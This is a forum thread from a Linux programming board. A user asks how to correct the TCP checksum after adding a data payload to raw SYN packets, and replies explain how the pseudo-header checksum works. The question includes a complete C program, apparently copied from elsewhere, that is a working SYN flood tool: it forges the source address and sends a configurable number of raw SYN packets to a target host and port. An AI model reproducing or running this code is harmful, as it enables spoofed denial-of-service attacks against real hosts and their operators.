Programming This forum is for all programming questions.
The question does not have to be directly related to Linux and any language is fair game. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
|
04-01-2004, 01:06 AM
|
#1
|
Member
Registered: Mar 2004
Posts: 71
Rep:
|
Raw Syn Packet with Data
I am trying to write a raw Syn packet that contains data, like "hello" or "whats up". I can add the data to the packet with the addition of char data[9], but I cant recalculate the TCP Checksum. Its always incorrect. I am using ethereal to compare values. What do I have to do in order to have a correct TCP checksum with the addition of a data payload? The following is the (not mine) code:
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/ip.h>
#include <linux/tcp.h>
void hose_trusted(unsigned int, unsigned int, unsigned short, int);
unsigned short in_cksum(unsigned short *, int);
unsigned int host2ip(char *);
main(int argc, char **argv)
{
unsigned int srchost;
unsigned int dsthost;
unsigned short port=80;
unsigned int number=1000;
if(argc < 3)
{
printf("%s srchost dsthost port num\n", argv[0]);
exit(0);
}
srchost = host2ip(argv[1]);
dsthost = host2ip(argv[2]);
if(argc >= 4) port = atoi(argv[3]);
if(argc >= 5) number = atoi(argv[4]);
if(port == 0) port = 80;
if(number == 0) number = 1000;
printf("synflooding %s from %s port %u %u times\n", argv[2], argv[1], port, number);
hose_trusted(srchost, dsthost, port, number);
}
void hose_trusted(unsigned int source_addr, unsigned int dest_addr, unsigned short dest_port, int numsyns)
{
struct send_tcp
{
struct iphdr ip;
struct tcphdr tcp;
char data[9];
} send_tcp;
memset(send_tcp.data, 0, sizeof(send_tcp.data));
strcpy(send_tcp.data, "hello");
struct pseudo_header
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
} pseudo_header;
int i;
int tcp_socket;
struct sockaddr_in sin;
int sinlen;
/* form ip packet */
send_tcp.ip.ihl = 5;
send_tcp.ip.version = 4;
send_tcp.ip.tos = 0;
send_tcp.ip.tot_len = htons(40);
send_tcp.ip.id = getpid();
send_tcp.ip.frag_off = 0;
send_tcp.ip.ttl = 255;
send_tcp.ip.protocol = IPPROTO_TCP;
send_tcp.ip.check = 0;
send_tcp.ip.saddr = source_addr;
send_tcp.ip.daddr = dest_addr;
/* form tcp packet */
send_tcp.tcp.source = getpid();
send_tcp.tcp.dest = htons(dest_port);
send_tcp.tcp.seq = getpid();
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.doff = 5;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.rst = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.res2 = 0;
send_tcp.tcp.window = htons(512);
send_tcp.tcp.check = 0;
send_tcp.tcp.urg_ptr = 0;
/* setup the sin struct */
sin.sin_family = AF_INET;
sin.sin_port = send_tcp.tcp.source;
sin.sin_addr.s_addr = send_tcp.ip.daddr;
/* (try to) open the socket */
tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(tcp_socket < 0)
{
perror("socket");
exit(1);
}
for(i=0;i < numsyns;i++)
{
/* set fields that need to be changed */
send_tcp.tcp.source++;
send_tcp.ip.id++;
send_tcp.tcp.seq++;
send_tcp.tcp.check = 0;
send_tcp.ip.check = 0;
/* calculate the ip checksum */
send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
/* set the pseudo header fields */
pseudo_header.source_address = send_tcp.ip.saddr;
pseudo_header.dest_address = send_tcp.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20);
bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
sinlen = sizeof(sin);
sendto(tcp_socket, &send_tcp, 40, 0, (struct sockaddr *)&sin, sinlen);
}
close(tcp_socket);
}
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
unsigned int host2ip(char *hostname)
{
static struct in_addr i;
struct hostent *h;
i.s_addr = inet_addr(hostname);
if(i.s_addr == -1)
{
h = gethostbyname(hostname);
if(h == NULL)
{
fprintf(stderr, "cant find %s!\n", hostname);
exit(0);
}
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}
This is really bothering me. Please help!
-GSD
|
|
|
04-06-2004, 12:54 PM
|
#2
|
Member
Registered: Mar 2004
Posts: 71
Original Poster
Rep:
|
I have found and read about libnet and I have been using that. I am able to send a TCP Syn packet with a payload. However, I would still like to find out how to add a payload to the code posted above. If anyone has an idea, please reply! Thank you!
-GSD
|
|
|
04-06-2004, 02:05 PM
|
#3
|
Member
Registered: Mar 2003
Posts: 804
Rep:
|
the checksum is supposed to cover the tcp header and data, as well as the 12 byte pseudoheader.
|
|
|
04-06-2004, 05:03 PM
|
#4
|
Member
Registered: Mar 2004
Posts: 71
Original Poster
Rep:
|
So should I add a member in pseudo_header named "char data[9]" and recalculate the checksum with the newly defined pseudo_header? I'm not 100% sure how to implement your reply. If you could show me code modification or an example in the form of code, I would greatly appreciate it!
-GSD
|
|
|
04-06-2004, 05:53 PM
|
#5
|
Member
Registered: Mar 2003
Posts: 804
Rep:
|
Code:
[pseudo header] }
[tcp header] } - tcp checksum covers these 3
[tcp data] }
set tcp sum to 0, copy pseudo header into a buffer, append tcp header, append tcp data, call checksum function passing pointer to start of buffer and combined length of all 3 pieces.
Last edited by infamous41md; 04-06-2004 at 05:54 PM.
|
|
|
All times are GMT -5. The time now is 11:54 PM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|